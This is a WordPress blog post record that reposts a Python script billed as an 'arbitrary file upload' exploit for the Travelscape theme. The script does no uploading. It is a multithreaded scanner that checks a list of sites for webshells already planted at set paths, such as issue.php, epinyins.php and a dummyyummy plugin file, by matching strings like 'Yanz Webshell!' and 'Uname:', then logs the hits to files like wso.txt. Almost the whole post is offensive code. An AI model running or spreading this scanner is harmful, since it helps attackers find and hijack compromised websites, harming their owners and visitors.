{"id":56154,"date":"2024-04-08T20:59:43","date_gmt":"2024-04-08T16:59:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177987\/wptravelscape103-upload.txt"},"modified":"2024-04-08T20:59:43","modified_gmt":"2024-04-08T16:59:43","slug":"wordpress-travelscape-theme-1-0-3-arbitrary-file-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-travelscape-theme-1-0-3-arbitrary-file-upload\/","title":{"rendered":"WordPress Travelscape Theme 1.0.3 Arbitrary File Upload"},"content":{"rendered":"
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
requests.urllib3.disable_warnings()
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla\/5.0 (Linux; Android 7.0; SM-G892A Build\/NRD90M;
wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/60.0.3112.107
Mobile Safari\/537.36',
'Accept':
'text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8',<\/p>
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'Referer': 'www.google.com'
}
def URLdomain(url):
if url.startswith(\"http:\/\/\"):
url = url.replace(\"http:\/\/\", \"\")
elif url.startswith(\"https:\/\/\"):
url = url.replace(\"https:\/\/\", \"\")
if '\/' in url:
url = url.split('\/')[0]return url
def check_security(url):
fg = success_color
fr = error_color
try:
url = 'http:\/\/' + URLdomain(url)
check = requests.get(url +
'\/wp-content\/themes\/travelscape\/json.php', headers=headers,
allow_redirects=True, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'\/wp-content\/themes\/travelscape\/json.php\\n')
else:
url = 'https:\/\/' + URLdomain(url)
check = requests.get(url +
'\/wp-content\/themes\/aahana\/json.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'\/wp-content\/themes\/aahana\/json.php\\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
check = requests.get(url + '\/wp-content\/themes\/travel\/issue.php',
headers=headers, allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url +
'\/wp-content\/themes\/travel\/issue.php\\n')
else:
url = 'https:\/\/' + URLdomain(url)
check = requests.get(url + '\/about.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '\/about.php\\n')
else:
url = 'https:\/\/' + URLdomain(url)
check = requests.get(url +
'\/wp-content\/themes\/digital-download\/new.php', headers=headers,
allow_redirects=True, timeout=15)
if '#0x2525' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('digital-download.txt', 'a').write(url +
'\/wp-content\/themes\/digital-download\/new.php\\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'http:\/\/' + URLdomain(url)
check = requests.get(url + '\/epinyins.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '\/epinyins.php\\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'https:\/\/' + URLdomain(url)
check = requests.get(url + '\/wp-admin\/dropdown.php',
headers=headers, allow_redirects=True, verify=False, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '\/wp-admin\/dropdown.php\\n')
else:
url = 'https:\/\/' + URLdomain(url)
check = requests.get(url +
'\/wp-content\/plugins\/dummyyummy\/wp-signup.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'Simple Shell' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('dummyyummy.txt', 'a').write(url +
'\/wp-content\/plugins\/dummyyummy\/wp-signup.php\\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
except Exception as e:
print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
try:
url_file_path = sys.argv[1]except IndexError:
url_file_path = input(f\"{info_color}Enter the path to the file
containing URLs: \")
if not os.path.isfile(url_file_path):
print(f\"{error_color}[ERROR] The specified file path is
invalid.\")
sys.exit(1)
try:
urls_to_check = [line.strip() for line in open(url_file_path, 'r',
encoding='utf-8').readlines()]except Exception as e:
print(f\"{error_color}[ERROR] An error occurred while reading the
file: {e}\")
sys.exit(1)
pool = ThreadPool(20)
pool.map(check_security, urls_to_check)
pool.close()
pool.join()
print(f\"{info_color}Security check process completed successfully.
Results are saved in corresponding files.\")
if __name__ == \"__main__\":
main()<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Wordpress Theme Travelscape v1.0.3 – Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {‘Connection’: ‘keep-alive’,’Cache-Control’: ‘max-age=0′,’Upgrade-Insecure-Requests’: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56154","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56154","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56154"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56154\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56154"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56154"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}